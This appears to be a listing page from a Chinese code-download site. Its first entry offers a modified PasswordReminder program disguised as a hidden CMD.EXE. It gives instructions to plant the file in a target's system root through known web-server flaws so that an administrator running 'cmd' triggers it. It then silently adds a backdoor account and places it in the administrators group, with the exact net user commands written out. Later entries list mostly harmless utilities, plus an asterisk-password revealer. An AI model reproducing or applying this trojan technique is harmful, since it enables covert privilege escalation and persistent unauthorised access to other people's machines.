-
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
- 2022-06-01 08:01:12下载
- 积分:1
-
- 2022-03-07 11:04:02下载
- 积分:1
-
< 网络安全开发包详解>>随书代码,主要是winpcap包的使用。...
< 网络安全开发包详解>>随书代码,主要是winpcap包的使用。-err
- 2023-05-09 21:00:03下载
- 积分:1
-
运行程序杀手关闭正在运行的程序.自己可以选择
运行程序杀手关闭正在运行的程序.自己可以选择-Killer run the program shut down running programs. They can choose
- 2022-01-26 05:40:10下载
- 积分:1
-
比较无聊的程序
比较无聊的程序-Comparison of boring process
- 2022-01-23 11:24:44下载
- 积分:1
-
Shows the Space Used By Each Sub
Shows the Space Used By Each Sub-Directory On A Drive- Shows the Space Used By Each Sub-Directory On A Drive
- 2022-08-19 21:49:41下载
- 积分:1
-
显示详细的系统资料(11KB)
显示详细的系统资料(11KB)-shows detailed information system (11KB more)
- 2022-05-10 21:29:30下载
- 积分:1
-
YAMD 是一款很有效的内存调试工具,能够用于linux下内存泄露的调试。...
YAMD 是一款很有效的内存调试工具,能够用于linux下内存泄露的调试。-YAMD is one very effective memory debugging tools can be used under Linux Debugging Memory divulged.
- 2022-03-06 01:07:27下载
- 积分:1
-
程序里有一个张图片.把图片移动到星号密码上,密码的原
程序里有一个张图片.把图片移动到星号密码上,密码的原-there are procedures for a photo. Pictures moved to the asterisk password, the original password
- 2022-03-07 13:23:44下载
- 积分:1
-
完整的屏保,支持参数和密码设置
完整的屏保,支持参数和密码设置-complete screensavers, support and password parameters set
- 2022-02-24 18:11:40下载
- 积分:1